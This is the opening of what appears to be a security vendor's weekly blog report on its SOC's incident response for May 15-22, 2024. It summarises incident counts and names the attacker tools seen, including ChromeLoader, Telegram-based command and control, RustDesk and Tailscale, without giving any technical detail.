Between May 15-22, 2024, Blackpoint’s Security Operations Center (SOC) responded to 113 total incidents. These incidents included 27 on-premises MDR incidents, no Cloud Responses for Google Workspace, and 86 Cloud Response for Microsoft 365 incidents, with confirmed or likely threat actor use of:
- Multiple ChromeLoader attacks across Financial, Retail, Government, and Healthcare industry partners for information theft, including credential harvesting;
- Telegram messenger and scheduled tasks for command and control, persistence, and exfiltration; and
- RustDesk and Tailscale for persistence.
In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if they’ve not been attacked yet! – as well as possible mitigations leveraging your current tech stack and Blackpoint Cyber.